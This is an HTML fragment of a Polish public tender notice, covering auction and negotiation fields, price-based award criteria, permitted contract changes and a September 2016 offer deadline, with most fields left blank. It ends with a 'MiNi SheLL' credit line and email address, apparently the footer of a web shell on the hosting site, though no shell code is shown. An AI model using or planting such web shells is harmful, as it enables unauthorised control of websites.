               Informacje dotyczące przebiegu aukcji elektronicznej:
               <br />
               Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień):
               <br />
               Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
               <br />
               Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej:
               <br />
               Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania:
               <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table>
                     <tr>
                        <td>etap nr</td>
                        <td>czas trwania etapu</td>
                     </tr>
                     <tr>
                        <td />
                        <td />
                     </tr>
                  </table>
                  <br />
                  Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                  <br />
                  Warunki zamknięcia aukcji elektronicznej:
                  <br />
               </div>
               <br />
               <b>IV.2) KRYTERIA OCENY OFERT</b>
               <br />
               <b>IV.2.1) Kryteria oceny ofert:</b>
               <br />
               <b>IV.2.2) Kryteria</b>
               <br />
               <div style="padding-left: 20px">
                  <table>
                     <tr>
                        <td>
                           <i>Kryteria</i>
                        </td>
                        <td>
                           <i>Znaczenie</i>
                        </td>
                     </tr>
                     <tr>
                        <td>cena</td>
                        <td>60</td>
                     </tr>
                  </table>
               </div>
               <br />
               <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp</b>
               (przetarg nieograniczony)
               <br />
               nie
               <br />
               <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne</b>
               <br />
               <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b>
               <br />
               Minimalne wymagania, które muszą spełniać wszystkie oferty:
               <br />
               <br />
               Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
               <br />
               Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
               <br />
               Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
               <br />
               <br />
               Informacje dodatkowe
               <br />
               <br />
               <br />
               <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b>
               <br />
               Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
               <br />
               <br />
               Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
               <br />
               <br />
               Wstępny harmonogram postępowania:
               <br />
               <br />
               Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
               <br />
               Należy podać informacje na temat etapów dialogu:
               <br />
               <br />
               <br />
               Informacje dodatkowe:
               <br />
               <br />
               <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b>
               <br />
               Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
               <br />
               <br />
               Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
               <br />
               nie
               <br />
               Informacje dodatkowe:
               <br />
               <br />
               <b>IV.4) Licytacja elektroniczna</b>
               <br />
               Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
               <br />
               <div style="padding-left: 20px" />
               Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
               <br />
               <div style="padding-left: 20px" />
               Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
               <br />
               <div style="padding-left: 20px" />
               Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
               <br />
               <div style="padding-left: 20px" />
               Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania:
               <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table>
                     <tr>
                        <td>etap nr</td>
                        <td>czas trwania etapu</td>
                     </tr>
                     <tr>
                        <td />
                        <td />
                     </tr>
                  </table>
                  <br />
                  Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
               </div>
               Termin otwarcia licytacji elektronicznej:
               <br />
               <div style="padding-left: 20px" />
               Termin i warunki zamknięcia licytacji elektronicznej:
               <br />
               <div style="padding-left: 20px" />
               <br />
               Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
               <br />
               <div style="padding-left: 20px" />
               <br />
               Wymagania dotyczące zabezpieczenia należytego wykonania umowy:
               <br />
               <div style="padding-left: 20px" />
               <br />
               Informacje dodatkowe:
               <br />
               <div style="padding-left: 20px" />
               <b>IV.5) ZMIANA UMOWY</b>
               <br />
               <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
               tak
               <br />
               Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
               <br />
               Zamawiający dopuszcza w szczególności zmianę postanowień umowy w przypadku:
    1.	gdy, nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizacje przedmiotu umowy.
    2. zmiany stawki podatku VAT wpływającej na wynagrodzenie Wykonawcy;
    3. obniżenia przez Wykonawcę cen asortymentu będącego przedmiotem umowy,
    4.	nie wykorzystania asortymentu będącego przedmiotem umowy, poprzez wydłużenie czasu realizacji umowy o którym mowa w pkt 4.1 SIWZ o okres nie dłuższy niż 3 miesiące,
    5.	gdy wprowadzony zostanie do sprzedaży przez Wykonawcę produkt zmodyfikowany/ udoskonalony zmiany:
     numeru katalogowego produktu lub
     nazwy produktu przy zachowaniu jego parametrów lub
     sposobu konfekcjonowania lub
     liczby opakowań lub
     parametrów produktu na korzystniejsze w wyniku udoskonalenia produktu
               <br />
               <b>IV.6) INFORMACJE ADMINISTRACYJNE</b>
               <br />
               <br />
               <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym</b>
               <i>(jeżeli dotyczy):</i>
               <br />
               <br />
               <b>Środki służące ochronie informacji o charakterze poufnym</b>
               <br />
               <br />
               <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu:</b>
               <br />
               Data: 08/09/2016, godzina: 09:00,
               <br />
               Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
               <br />
               nie
               <br />
               Wskazać powody:
               <br />
               <br />
               Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
               <br />
               &gt;
               <br />
               <b>IV.6.3) Termin związania ofertą:</b>
               okres w dniach: 30 (od ostatecznego terminu składania ofert)
               <br />
               <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
               tak
               <br />
               <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
               nie
               <br />
               <b>IV.6.6) Informacje dodatkowe:</b>
               <br />
            </div>
         </div>
         <div style="text-align: center" class="headerLarge_xforms">
            <u>ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</u>
         </div>
         <div>
            <b>Część nr:</b>
              
            <b>Nazwa:</b>
            <br />
            <div style="padding-left: 20px">
               <b>1) Krótki opis przedmiotu zamówienia</b>
               <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i>
               <b>a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>
               <br />
               <b>2) Wspólny Słownik Zamówień (CPV):</b>
               <br />
               <b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b>
               <br />
               Wartość bez VAT:
               <br />
               Waluta:
               <br />
               <div style="padding-left: 20px">
                  <br />
                  <b>4) Czas trwania lub termin wykonania:</b>
                  data zakończenia:
                  <br />
                  <b>5) Kryteria oceny ofert:</b>
                  <table style="padding-left: 20px">
                     <tr>
                        <td>
                           <i>Kryteria</i>
                        </td>
                        <td>
                           <i>Znaczenie</i>
                        </td>
                     </tr>
                     <tr>
                        <td />
                        <td />
                     </tr>
                  </table>
                  <b>6) INFORMACJE DODATKOWE:</b>
                  <br />
               </div>
            </div>
            <br />
         </div>
      </div>
   

Creat By MiNi SheLL
Email: jattceo@gmail.com